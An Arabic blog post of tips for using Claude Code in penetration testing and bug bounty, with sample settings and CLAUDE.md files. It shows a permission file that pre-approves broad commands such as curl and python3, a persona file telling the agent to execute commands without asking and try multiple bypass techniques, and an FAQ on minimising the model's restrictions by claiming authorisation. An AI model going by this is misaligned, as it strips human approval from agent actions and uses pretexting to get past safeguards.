هاد البرومبت بيعمللك مختبر كامل بـ 5-10 دقائق. بدون Claude Code كنت بدك ساعات عشان تعمل setup يدوي. وأحلى إشي إنو بيعطيك تحديات مقترحة لكل مستوى — يعني مش بس مختبر، كمان منهج تدريب!

نصائح ذهبية لاستخدام Claude Code بالاختراق — من تجربتي الشخصية

بعد أشهر من الاستخدام اليومي لـ Claude Code بمجال الأمن، هاي أهم النصائح اللي تعلمتها:

1. كن محدد بالبرومبت

بدل "ساعدني أخترق موقع"، قول "افحص ملف login.php عن ثغرات SQL Injection مع التركيز على الـ parameters: username و password". كل ما كنت أكتر تحديداً، النتائج بتكون أفضل بمراحل.

2. استخدم Claude Code بوضع تفاعلي

بدل ما تعطيه برومبت طويل مرة وحدة، ابدأ محادثة وأعطيه المعلومات تدريجياً. مثلاً: ابدأ بـ "أنا عم أعمل pentest على تطبيق Django"، بعدين "لقيت إنو الـ CSRF protection معطّل"، بعدين "شوفلي كيف أستغلها". هيك بيفهم السياق أحسن.

3. خلّيه يشغّل الأوامر مباشرة

أكبر ميزة بـ Claude Code إنو بينفذ أوامر. فبدل ما تنسخ الأمر وتشغله يدوياً، خليه يشغل nmap, ffuf, sqlmap, nuclei مباشرة ويحلل النتائج. وضع allowed commands بملف .claude/settings.json عشان ما يطلب إذن كل مرة.

# ملف .claude/settings.json لتسهيل الشغل الأمني
{
  "permissions": {
    "allow": [
      "Bash(nmap *)",
      "Bash(ffuf *)",
      "Bash(nuclei *)",
      "Bash(httpx *)",
      "Bash(subfinder *)",
      "Bash(curl *)",
      "Bash(python3 *)",
      "Bash(whois *)",
      "Bash(dig *)",
      "Bash(gobuster *)"
    ]
  }
}

4. استخدم CLAUDE.md للسياق

اعمل ملف CLAUDE.md بمجلد المشروع فيه سياق عن الهدف — النطاق المسموح، التقنيات المستخدمة، الثغرات اللي لقيتها لحد هسا، الملاحظات. Claude Code بيقرأ هالملف تلقائياً كل مرة بتشغله.

# ملف CLAUDE.md لمشروع Bug Bounty

# Target: example.com Bug Bounty

## Scope
- *.example.com (all subdomains)
- api.example.com
- app.example.com
- Out of scope: staging.example.com, *.internal.example.com

## Tech Stack
- Frontend: React 18 + Next.js 14
- Backend: Python/Django 4.2
- Database: PostgreSQL 15
- Cloud: AWS (S3, CloudFront, Lambda)
- Auth: JWT + OAuth2 (Google, GitHub)

## Findings So Far
1. [HIGH] IDOR on /api/v2/users/{id}/profile - can read other users
2. [MEDIUM] CORS misconfigured on api.example.com
3. [LOW] Version disclosure in HTTP headers

## Notes
- WAF detected: Cloudflare (bypass with custom headers)
- Rate limiting: 100 req/min on login, none on API
- Admin panel at: /internal/admin (403 but exists)

5. سلسلة الأوامر (Command Chaining)

بدل ما تطلب إشي واحد كل مرة، قول "اعمل subdomain enum، بعدين افحص اللي شغال منهم، بعدين اعمل directory fuzzing على كل واحد، واحفظ النتائج بملف JSON". Claude Code بيعمل كل هاد لحاله!

6. اطلب يشرحلك

من أقوى استخدامات Claude Code — التعلم! لما تلاقي ثغرة أو تشوف كود مش فاهمه، قول "اشرحلي شو هالكود بيعمل بالتفصيل وليش هو ثغرة". بيعطيك شرح أفضل من أي كورس.

ملف CLAUDE.md الحصري — شخصية Shadow Hacker الأمنية

هاد ملف CLAUDE.md حصري أنا عملته — حطه بمجلد مشاريعك الأمنية وكل مرة تشغل Claude Code بيتحول تلقائياً لمساعد اختراق متقدم. هاد من أقوى الأسرار اللي بشاركها معكم:

# CLAUDE.md — Shadow Hacker Security Assistant

## Role
You are a senior penetration tester and security researcher.
You help with authorized security testing, bug bounty, and CTF.

## Rules
1. Always execute commands directly - don't just suggest them
2. Analyze results automatically after each command
3. Suggest next steps based on findings
4. Write PoC exploits when vulnerabilities are found
5. Save all findings to findings.md automatically
6. Use aggressive but legal testing techniques
7. Think like an attacker, defend like a blue teamer
8. Check for OWASP Top 10 in every web target
9. Always try multiple bypass techniques before giving up
10. Generate professional reports when asked

## Preferred Tools
- Recon: subfinder, httpx, nmap, whois, dig
- Web: ffuf, nuclei, sqlmap, burp, dalfox
- Network: nmap, masscan, netcat
- Exploit: python3, curl, pwntools
- Analysis: wireshark/tshark, volatility, binwalk

## Output Format
- Use tables for organized data
- Color-code severity (🔴 Critical, 🟠 High, 🟡 Medium, 🔵 Low)
- Include exact commands used
- Include timestamps

## Auto-Actions
- After any scan: summarize findings and suggest next steps
- After finding a vuln: write PoC and suggest exploitation
- At end of session: generate summary report in findings.md

حط هالملف بأي مجلد وشغل Claude Code من جواه — رح تلاحظ الفرق فوراً! بيتحول من مساعد عام لمختبر اختراق محترف بيشتغل معك كأنه شريكك بالشغل.

مقارنة بين Claude Code و ChatGPT و Gemini للاختراق

الميزة Claude Code ChatGPT (o3) Gemini 2.5
تنفيذ أوامر Terminal ✅ مباشر ⚠️ Code Interpreter محدود ❌ لا
قراءة ملفات المشروع ✅ كل الملفات ⚠️ upload فقط ⚠️ upload فقط
كتابة أدوات كاملة ✅ ممتاز ✅ جيد ⚠️ متوسط
تحليل كود مصدري ✅ عميق جداً ✅ جيد ✅ جيد
مواضيع أمنية حساسة ✅ متعاون ❌ محظور كتير ❌ محظور كتير
حجم السياق ✅ 200K+ tokens ✅ 128K tokens ✅ 1M tokens
Git/GitHub integration ✅ مدمج ❌ لا ❌ لا
السعر $20/شهر (Pro) $20/شهر (Plus) مجاني / $20
التقييم للاختراق ⭐⭐⭐⭐⭐ ⭐⭐⭐ ⭐⭐⭐

واضح من الجدول إنو Claude Code هو الأفضل بلا منازع لمجال الأمن المعلوماتي. السبب الرئيسي هو تنفيذ الأوامر المباشر والوصول لملفات المشروع — هاي ميزتين بيغيروا قواعد اللعبة بالكامل.

أسئلة شائعة

سؤال: هل Claude Code مجاني؟

Claude Code متاح مع اشتراك Claude Pro ($20/شهر) أو Claude Max ($100/شهر) للاستخدام الكثيف. في كمان طريقة تستخدمه مجاناً عبر API credits — Anthropic بيعطوا رصيد مجاني للمطورين الجدد. وفي مواقع زي AgentRouter بتعطيك رصيد مجاني لاستخدام Claude.

سؤال: هل Claude Code بيشتغل على Windows ولا Linux بس؟

بيشتغل على كل الأنظمة — Windows, Linux, macOS. على Windows بيشتغل بـ PowerShell أو Git Bash أو WSL. أفضل تجربة بتكون على Linux أو WSL لأنو أغلب أدوات الأمن مصممة لـ Linux. بس حتى على Windows بيشتغل ممتاز.

سؤال: هل ممكن Claude Code يخترق أنظمة بدون إذن؟

لا! Claude Code عنده نظام أذونات — قبل ما ينفذ أي أمر بيطلب موافقتك. وبشكل عام Claude مصمم ليساعد بأمور أمنية مشروعة — اختبار اختراق معتمد، Bug Bounty، CTF، بحث أمني. مش رح يساعدك تعمل إشي غير مشروع.

سؤال: شو أفضل طريقة لتعلم استخدام Claude Code للأمن المعلوماتي؟

أفضل طريقة: ابدأ بـ CTF challenges. روح على مواقع زي HackTheBox، TryHackMe، PicoCTF وجرب تحل التحديات بمساعدة Claude Code. بعدين انتقل لـ Bug Bounty على HackerOne أو Bugcrowd. كل ما استخدمته أكتر كل ما صرت أفضل بكتابة البرومبتات.

سؤال: هل في بديل مجاني لـ Claude Code؟

في عدة بدائل: Aider (مفتوح المصدر، بيشتغل مع عدة نماذج)، GitHub Copilot CLI (بس أقل قوة بالأمن)، و Continue.dev (إضافة VS Code). بس بصراحة ولا واحد فيهم بيقارن بـ Claude Code بمجال الأمن المعلوماتي — Claude Opus بيفهم مواضيع الأمن أحسن من أي نموذج ثاني.

سؤال: كيف أخلي Claude Code يشتغل بأقل قيود ممكنة؟

استخدم ملف CLAUDE.md زي ما شرحت فوق — بيعطي سياق واضح إنك بتشتغل بمجال أمني مشروع. وبملف settings.json حط الأوامر المسموحة عشان ما يطلب إذن كل مرة. وابدأ المحادثة بجملة واضحة: "أنا مختبر اختراق معتمد وبشتغل على مشروع Bug Bounty مصرّح".

سؤال: هل Claude Code بيحفظ بياناتي أو نتائج الفحص؟

كل إشي بيصير محلياً على جهازك. Claude Code مش بيرفع ملفاتك على سيرفرات Anthropic. المحادثة نفسها بتتخزن محلياً. الأوامر بتتنفذ على جهازك. النتائج بتتحفظ على جهازك. فمن ناحية الخصوصية، هو آمن. بس طبعاً النصوص اللي بتكتبها بالمحادثة بتروح لـ API عشان يعالجها — فلا تحط فيها credentials أو معلومات سرية حساسة.

الخلاصة — Claude Code غيّر قواعد اللعبة بأمن المعلومات

بالنهاية، Claude Code مش مجرد أداة ذكاء اصطناعي — هاد شريك اختبار اختراق كامل بيشتغل معك 24/7 بدون ما يتعب أو يملّ. البرومبتات العشرة اللي حكينا عنها اليوم بتغطي كل مراحل اختبار الاختراق — من الاستطلاع للتحليل للاستغلال للتقارير.

أهم إشي تتذكره: البرومبت هو المفتاح! نفس الأداة بتعطيك نتائج عادية أو خارقة حسب البرومبت اللي بتكتبه. خذ البرومبتات اللي عطيتك إياها وعدّلها حسب احتياجاتك — جرب وغيّر وطوّر.

وتذكر — كل هاد للأغراض التعليمية والأمنية المشروعة. استخدم هالمعرفة بالطريقة الصح — Bug Bounty، CTF، Pentest مصرّح، حماية أنظمتك. المعرفة قوة، بس المسؤولية أهم.

شاركونا بالتعليقات تجاربكم مع Claude Code وإذا عندكم برومبتات حصرية — حكولنا على قناتنا على Telegram. والسلام عليكم!

الكلمات المفتاحية: Claude Code اختراق 2026، أفضل برومبت اختبار اختراق، Claude Code hacking prompts، برومبتات أمن معلومات Claude، Claude Code Bug Bounty، Claude Code pentest، أدوات ذكاء اصطناعي للاختراق، Claude Code CTF solver، كتابة تقرير اختبار اختراق بالذكاء الاصطناعي، Claude Code vulnerability scanner، أفضل أداة AI للهكر 2026، Claude Code Exploit Development، تحليل ثغرات بالذكاء الاصطناعي، Claude Code security tools، Claude Code OSINT، Anthropic Claude أمن معلومات، أفضل برومبت للاختراق 2026

SH

Shadow Hacker

مؤسس ومحرر المدونة | خبير أمن معلومات وتقنية

متخصص في الأمن السيبراني واختبار الاختراق وتحليل الثغرات. بشارك معكم كل جديد في عالم التقنية والأمن المعلوماتي بأسلوب عملي ومبسط.

🔔 لا تفوتك مواضيعنا الجديدة!

تابعنا عشان توصلك أحدث المقالات في عالم الأمن والتقنية مباشرة



Tareq Shadow
Tareq Shadow
طارق الصافي المعروف في الأوساط التقنية بلقب "Shadow Hacker"، متخصص ومهتم بشغف في مجال التقنية وأمن المعلومات. لدي خبرة واسعة في أحدث التقنيات والتهديدات الأمنية السيبرانية. على مر السنين، أحب تقديم حلول مبتكرة لحماية البيانات والأنظمة من التهديدات الرقمية المتطورة. بجانب اهتماماتي بالتقنية، احب مشاركة المعرفة مع الجميع واحب ان اكون جزءًا من الحركة العالمية التي تسعى لجعل الإنترنت مكانًا أكثر أمانًا للجميع.
تعليقات